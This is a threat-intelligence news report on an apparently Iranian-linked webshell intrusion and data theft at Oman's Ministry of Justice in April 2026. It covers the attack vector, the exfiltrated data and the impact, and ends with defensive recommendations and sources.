An Iranian-nexus threat actor carried out a targeted data theft attack against the Omani government on April 8 and April 10, 2026. The attackers compromised the Ministry of Justice and Legal Affairs and exfiltrated over 26,000 user records. These records included judicial case data, committee decisions, and system registry hives.

IT-security firm Hunt.io disclosed the incident publicly on May 5, 2026. This attack marks a significant escalation in Iranian cyber operations targeting Middle Eastern government institutions. It also highlights the ongoing vulnerability of judicial and legal infrastructure to advanced persistent threats.

What Happened: Iranian Threat Actor Hits Oman Ministry of Justice

Between April 8 and April 10, 2026, a suspected Iranian threat actor executed a sophisticated intrusion. The primary target was the Ministry of Justice and Legal Affairs (MJLA).

The attackers deployed a custom webshell on the subdomain mersaltest.mjla.gov.om. This webshell gave them persistent remote access to the ministry’s internal network. Consequently, they could maintain a foothold and exfiltrate sensitive data across multiple government entities.

AttackCapture scans first discovered the intrusion on April 8, 2026. Two days later, a second directory capture confirmed the ongoing compromise. Moreover, the attackers operated from a dedicated gov.om folder. This folder contained 12 exploit scripts, suggesting broader targeting of multiple Omani government organizations.

Technical Details of the Oman Data Breach

The intrusion leveraged a custom webshell on a test subdomain. This indicates the attackers may have exploited a development or staging environment first. These environments often have weaker security controls than production systems.

Once inside, the threat actor used command-and-control (C2) infrastructure and session logging. They also deployed automated data extraction tools to harvest information from compromised systems.

Attack Vector and Tools

• Initial access: Custom webshell on mersaltest.mjla.gov.om
• Persistence: Webshell with C2 code for ongoing access
• Reconnaissance: Session logs and network scanning tools
• Exploitation: Dedicated gov.om folder with 12 exploit scripts
• Data extraction: Automated tools targeting registry hives and user databases

Exfiltrated Data

The attackers successfully extracted sensitive government data, including:

• Over 26,000 Ministry of Justice user records
• Judicial case data and legal proceedings
• Committee decisions and internal rulings
• SAM and SYSTEM registry hives — indicating deep Windows system compromise

The extraction of SAM and SYSTEM registry hives is especially concerning. These files contain hashed passwords, user account information, and system configuration data. Attackers can use this information for further lateral movement, credential cracking, and persistent access to other government networks.

Business and Operational Impact

The breach of Oman’s Ministry of Justice carries serious implications. These extend beyond the Omani government to the broader Middle Eastern cybersecurity landscape.

First, judicial integrity is at risk. Compromised judicial records could undermine public trust in the legal system. Attackers could potentially manipulate ongoing proceedings.

Second, citizen identity exposure creates long-term risks. Over 26,000 user records contain personal and legal data. This exposure enables identity theft, blackmail, and targeted social engineering.

Third, the multi-entity targeting is alarming. The 12 exploit scripts in a dedicated gov.om folder suggest the threat actor targets additional Omani government institutions beyond the Ministry of Justice.

Finally, nation-state attribution elevates this beyond criminal activity. Iranian-nexus operations carry geopolitical implications. They may affect regional stability and diplomatic relations.

Mitigation and Recommendations

For government institutions and critical infrastructure defenders:

1. Audit test and staging environments. Immediately review all development and test subdomains. Look for unauthorized access, webshells, and anomalous file uploads.
2. Hunt for webshells. Conduct thorough endpoint and network scans. Search for known and custom webshell indicators, especially on government-facing web servers.
3. Reset credentials. Force password resets for all Ministry of Justice accounts. Also reset any accounts using shared credentials across government systems.
4. Monitor registry access. Alert on and investigate any unauthorized access to SAM, SYSTEM, or SECURITY registry hives.
5. Segment your networks. Isolate sensitive judicial and legal systems from general government networks. This limits lateral movement opportunities.
6. Share threat intelligence. Share IOCs and TTPs with regional and international partners. This helps identify related campaigns.

Bottom line: The Iranian-nexus attack on Oman’s Ministry of Justice shows why government web infrastructure needs robust security controls. Test and staging environments are often overlooked. However, they provide direct pathways to sensitive production data. Organizations should prioritize webshell hunting, credential hygiene, and network segmentation to mitigate similar nation-state threats.

Incident Summary

References

1. Hunt.io, “Iranian-Nexus Threat Actor Targeted Government Institutions In Oman On 8 April And 10 April 2026,” Hunt.io Threat Intelligence, May 5, 2026, https://database.eurepoc-dashboard.eu/?cyber_incident=5531 (accessed May 23, 2026)
2. EuRepoC Database, “Cyber Incident #5531 — Iranian-Nexus Threat Actor Targeted Government Institutions In Oman,” European Repository of Cyber Incidents, May 7, 2026, https://eurepoc.eu/table-view/?cyber_incident=5531 (accessed May 23, 2026)